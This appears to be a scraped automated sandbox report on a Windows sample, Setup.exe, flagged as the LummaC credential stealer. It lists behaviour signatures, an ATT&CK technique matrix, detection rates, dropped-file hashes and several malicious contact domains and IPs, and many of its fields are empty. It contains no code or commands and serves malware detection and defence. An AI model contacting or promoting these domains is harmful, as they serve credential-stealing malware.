Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Last function: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00406805 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 13 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 12 Process Injection | 2 Obfuscated Files or Information | 11 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 31 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | 11 Input Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 111 Masquerading | NTDS | 3 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 115 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 221 Virtualization/Sandbox Evasion | LSA Secrets | 221 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse | ||
13% | ReversingLabs | Win32.Ransomware.LummaC |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cegu.shop | 185.161.251.21 | true | false | high | |
rhetoricakue.cyou | 172.67.223.109 | true | true | unknown | |
klipgonuh.shop | 172.67.162.153 | true | false | unknown | |
lBgeGCTTqLMk.lBgeGCTTqLMk | unknown | unknown | false | unknown | |
dfgh.online | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
false |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
false | high | ||
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
true |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false | |
172.67.162.153 | klipgonuh.shop | United States | 13335 | CLOUDFLARENETUS | false | |
172.67.223.109 | rhetoricakue.cyou | United States | 13335 | CLOUDFLARENETUS | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588277 |
Start date and time: | 2025-01-10 23:24:17 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Setup.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@30/26@5/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 5796 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
17:25:11 | API Interceptor | |
17:25:15 | API Interceptor | |
17:26:13 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.161.251.21 | Get hash | malicious | LummaC Stealer | Browse | ||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
172.67.162.153 | Get hash | malicious | LummaC Stealer | Browse | ||
172.67.223.109 | Get hash | malicious | Mirai, Gafgyt | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cegu.shop | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
klipgonuh.shop | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | LummaC Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
NTLGB | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC Stealer | Browse |
| |
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com | Get hash | malicious | LummaC Stealer | Browse | ||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 947288 |
Entropy (8bit): | 6.630612696399572 |
Encrypted: | false |
SSDEEP: | 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK |
MD5: | 62D09F076E6E0240548C2F837536A46A |
SHA1: | 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2 |
SHA-256: | 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49 |
SHA-512: | 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 479170 |
Entropy (8bit): | 7.999608979983827 |
Encrypted: | true |
SSDEEP: | 12288:nrqkVGPEr9NO68M1F7h/ZkeKMeAE7mwjW9/oldrQBvhO8yqQ:rqkUKnO6B1TJeJ7tFdy8l |
MD5: | CECEF54353E4FDF1CCDD7F147448229A |
SHA1: | 2ABF40DB66BCCD9D3E364BE7A6247A471EA1AFD3 |
SHA-256: | AC1F74FC644B5CF17EF680824F773C40B3C298978391CD7934D53375DCCAA69F |
SHA-512: | AB871C97B3B514EE541514F6CC0DA9B55DA26D786613B3F9E588DEFD4A687D35BFA63795BD018CA1C1FC941FB9A65C40C9F262D775F5CB9FBCBE91F140C98FFF |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 148480 |
Entropy (8bit): | 6.7076315897773595 |
Encrypted: | false |
SSDEEP: | 3072:FxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpe:ZHS3zcNPj0nEo3tb2j6AUkB0CThpe |
MD5: | B93B2AF50CCEC005635F716EC072DCBE |
SHA1: | F4033005FE92D3D9DCA79122600952A9CB9FB996 |
SHA-256: | ADB16DB01927272A48403358940BDAA4D9649D8BA0B013A95C2819839AA478B0 |
SHA-512: | 2413A4C3485685E0CC1C2948BD65FA300EA1CDAC41ED0C43946193F4AD046A78332511C4E84710B1F8905CD64FA32CED11260B9342BA472B9866C0F128DEC185 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 62464 |
Entropy (8bit): | 7.9970435528360735 |
Encrypted: | true |
SSDEEP: | 1536:+Y7pHHrII31T9tv9Mi43P6EzG3CrBCscsgUIbGkDvx6QP:+WL3TlMioBzLtngUIb7UQP |
MD5: | D656E21DECDD65DA73C1D76DF53347BF |
SHA1: | 64A2D57377A79C561C8A18E6723B0F5A12D96BDE |
SHA-256: | A3590D66860C2C92FCC92CCD2B0541E7DB63ED7783FA92E1588545FEAAC1E823 |
SHA-512: | 0B1EAE9DB1025C33C101DA929EDD6566D2F9F379F3781BA435295FD6091609A356BC6101C93731BD2BEA41D0F5687951BD676E21D9D977BCF56B26061DE277D6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 152576 |
Entropy (8bit): | 6.240469335118957 |
Encrypted: | false |
SSDEEP: | 3072:75bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsa:75bLezWWt/Dd314V14ZgP0JaAOz04phl |
MD5: | 0EF636892399DA1E510FF10AB906BD86 |
SHA1: | 8D15D71EECD7F2CA2CAE8F38D6694314B0726A20 |
SHA-256: | 1DEB1534534A84BBBA7321C6FD6E9E34506F8C051B4D2BB1071BA1C427977231 |
SHA-512: | 5881BCEFADEE4A3072D8118095BCFFDA7C9AC4FBB1AAB7C6A20F6973F9462D9830D37D22B43209ACBB5F6342A24FD265A8FA8CD5AD84B39EF013288B6D868368 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 117760 |
Entropy (8bit): | 4.661534949590551 |
Encrypted: | false |
SSDEEP: | 768:Sx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EI:SdKaj6iTcPAsAhxjgarB/5el3EI |
MD5: | 664328EE019462F865E94B7F37B783D8 |
SHA1: | 03920BAC1E0F8B7443F3308B9BA44A6149C7A2B2 |
SHA-256: | 59B70F66C964714C16E4F58E6C42130F845066C3D5D77C3138CF5F3D8CC95FED |
SHA-512: | D67292550F5C8FB49D93337824558CDCA1A127D06A0FDB46E5C5C7B3A288BDA8FC6D4B0CEF47FA61E1211C4737C2B3E8A3426E44E10DF1A2EFDE71AFF0F461CD |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 68546 |
Entropy (8bit): | 7.997340258614435 |
Encrypted: | true |
SSDEEP: | 1536:kiCpIUOURA9F7mCRZciPf0Vr6qIv0Jl13D4mxSUDlFQzi0h8Fqpp9Ov:kiCfRuF7PNPc80tEmxSU5220CFqpSv |
MD5: | 15797BA22006CB78AC5C0F7077D89E78 |
SHA1: | 846DAFAC16BD2AFEBD20D9CD257345CC3C68FC0C |
SHA-256: | A74A84A64A8DD359D922BC4119C681D6855FEAA1720F63A233E63091EABBCBBB |
SHA-512: | BF3F29B1EDE56B30404D12F515A8802E26B73D127BBC5FA60F51F4A86A36A03580A2C8F143A17FFD26FACC7FABC8CE7D72D53BAAC3A21C243D9DCD79FD9033F8 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 23917 |
Entropy (8bit): | 5.1065864460151955 |
Encrypted: | false |
SSDEEP: | 384:EgWY0lQ08/c8v+20PiC+LcUJA9sBKVGya+X7UfcKUlu3F+7P0q6vxMsHU5ZiJM0V:qYMQ05RLF+YUyuBKVZa+X7U0KU43F2Va |
MD5: | 06B5826AEFEE2609CD5C3C0068D6FE05 |
SHA1: | 65E18F91AB04D2AF533C0354DA962F28119C0B8C |
SHA-256: | 354B019022EB8A55517ADE24E2A4F35469ED4CC5797C8038255713FDE10D6834 |
SHA-512: | CFAF2062ADB1E6F8B7300035C9B4B5EF123C6B10991DE25586EB7A154708406F9828FD8C0F0CAF86112D6EFD0C9887DB1D028FA1E456A9FEE4740B8605451692 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 23917 |
Entropy (8bit): | 5.1065864460151955 |
Encrypted: | false |
SSDEEP: | 384:EgWY0lQ08/c8v+20PiC+LcUJA9sBKVGya+X7UfcKUlu3F+7P0q6vxMsHU5ZiJM0V:qYMQ05RLF+YUyuBKVZa+X7U0KU43F2Va |
MD5: | 06B5826AEFEE2609CD5C3C0068D6FE05 |
SHA1: | 65E18F91AB04D2AF533C0354DA962F28119C0B8C |
SHA-256: | 354B019022EB8A55517ADE24E2A4F35469ED4CC5797C8038255713FDE10D6834 |
SHA-512: | CFAF2062ADB1E6F8B7300035C9B4B5EF123C6B10991DE25586EB7A154708406F9828FD8C0F0CAF86112D6EFD0C9887DB1D028FA1E456A9FEE4740B8605451692 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2605 |
Entropy (8bit): | 5.373913005487779 |
Encrypted: | false |
SSDEEP: | 48:A9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+M+:cSEA5O5W+MfH5S1CqlVJcI6+ |
MD5: | 64E1B429F3A6711AE857B100D8157FA3 |
SHA1: | ED289ED171CECA8DC51E6B3665FD257B583AC8F0 |
SHA-256: | 9346D3702FCDBD3397707C95E9A4DEDACC529C89C8D0A3E44BB4CA78925B11F0 |
SHA-512: | D8CDFF172D7784B74BDCD6D06ACAEA49225647547392CE0D0521E42842420409FCE8D1679C31363C3E0A37BB0BAD303FC4E9B3FCE047882A86D462FA8CF1ADFC |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 79872 |
Entropy (8bit): | 7.997381181827613 |
Encrypted: | true |
